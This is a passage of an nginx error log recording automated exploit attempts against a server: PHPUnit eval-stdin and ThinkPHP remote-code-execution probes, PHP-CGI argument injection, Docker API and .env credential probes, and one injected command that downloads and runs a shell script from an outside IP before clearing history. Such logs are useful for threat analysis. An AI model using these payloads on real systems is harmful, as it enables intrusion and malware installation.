/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:28 [error] 819#819: *14815 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:26:07 [error] 830#830: *18736 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:46 [error] 827#827: *18746 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:48 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:49 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:50 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:51 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:52 [error] 827#827: *18746 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:54 [error] 827#827: *18746 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:55 [error] 827#827: *18746 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:56 [error] 827#827: *18746 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:57 [error] 827#827: *18746 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:58 [error] 827#827: *18746 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:36:59 [error] 827#827: *18746 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:01 [error] 827#827: *18746 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:02 [error] 827#827: *18746 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:03 [error] 827#827: *18746 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:04 [error] 827#827: *18746 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:05 [error] 827#827: *18746 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:06 [error] 827#827: *18746 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:07 [error] 827#827: *18746 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:09 [error] 827#827: *18746 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:10 [error] 827#827: *18746 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:11 [error] 827#827: *18746 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:12 [error] 827#827: *18746 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:14 [error] 827#827: *18746 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:15 [error] 827#827: *18746 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:16 [error] 827#827: *18746 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:17 [error] 827#827: *18746 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:18 [error] 827#827: *18746 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:19 [error] 827#827: *18746 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:20 [error] 827#827: *18746 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:22 [error] 827#827: *18746 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:23 [error] 827#827: *18746 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:24 [error] 827#827: *18746 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:25 [error] 827#827: *18746 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:26 [error] 827#827: *18746 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:27 [error] 827#827: *18746 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:28 [error] 827#827: *18746 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:30 [error] 827#827: *18746 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:31 [error] 827#827: *18746 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:32 [error] 827#827: *18746 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 12:37:36 [error] 827#827: *18746 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 20.59.121.110, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 14:22:22 [error] 829#829: *21348 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 14:38:18 [error] 829#829: *22498 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 35.203.211.208, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 18:57:07 [error] 842#842: *25287 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 167.94.146.57, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "222.117.41.51" -2026/02/15 20:48:05 [error] 839#839: *25425 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 47.121.210.129, server: localhost-nginx-proxy-manager, request: "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.43%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+rm+-rf+%2A.sh%3B+history+-c HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 21:37:09 [error] 839#839: *25442 open() "/var/www/html/vpn/js/rdx/core/lang/rdx_en.json.gz" failed (2: No such file or directory), client: 173.255.221.145, server: localhost-nginx-proxy-manager, request: "GET /vpn/js/rdx/core/lang/rdx_en.json.gz HTTP/1.1", host: "222.117.41.51" -2026/02/15 21:37:32 [error] 840#840: *25443 open() "/var/www/html/wsman" failed (2: No such file or directory), client: 167.99.11.195, server: localhost-nginx-proxy-manager, request: "POST /wsman HTTP/1.1", host: "222.117.41.51" -2026/02/15 21:37:51 [error] 840#840: *25445 open() "/var/www/html/_layouts/15/error.aspx" failed (2: No such file or directory), client: 206.189.72.48, server: localhost-nginx-proxy-manager, request: "GET /_layouts/15/error.aspx HTTP/1.1", host: "222.117.41.51" -2026/02/15 21:38:11 [error] 840#840: *25447 open() "/var/www/html/auth.html" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /auth.html HTTP/1.1", host: "222.117.41.51" -2026/02/15 21:38:11 [error] 840#840: *25448 open() "/var/www/html/auth1.html" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /auth1.html HTTP/1.1", host: "222.117.41.51" -2026/02/15 21:38:12 [error] 840#840: *25449 open() "/var/www/html/sslvpnLogin.html" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /sslvpnLogin.html HTTP/1.1", host: "222.117.41.51" -2026/02/15 21:38:12 [error] 840#840: *25450 open() "/var/www/html/api/sonicos/auth" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /api/sonicos/auth HTTP/1.1", host: "222.117.41.51" -2026/02/15 21:38:12 [error] 840#840: *25451 open() "/var/www/html/api/sonicos/tfa" failed (2: No such file or directory), client: 64.227.19.194, server: localhost-nginx-proxy-manager, request: "GET /api/sonicos/tfa HTTP/1.1", host: "222.117.41.51" -2026/02/15 21:57:28 [error] 839#839: *26956 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:31 [error] 843#843: *26985 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:32 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:32 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:32 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:32 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:33 [error] 843#843: *26985 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:33 [error] 843#843: *26985 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:33 [error] 843#843: *26985 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:33 [error] 843#843: *26985 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:34 [error] 843#843: *26985 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:35 [error] 843#843: *26985 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:35 [error] 843#843: *26985 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:35 [error] 843#843: *26985 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:35 [error] 843#843: *26985 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:36 [error] 843#843: *26985 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:37 [error] 843#843: *26985 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:37 [error] 843#843: *26985 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:37 [error] 843#843: *26985 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:37 [error] 843#843: *26985 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:39 [error] 843#843: *26985 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:39 [error] 843#843: *26985 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 22:26:39 [error] 843#843: *26985 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 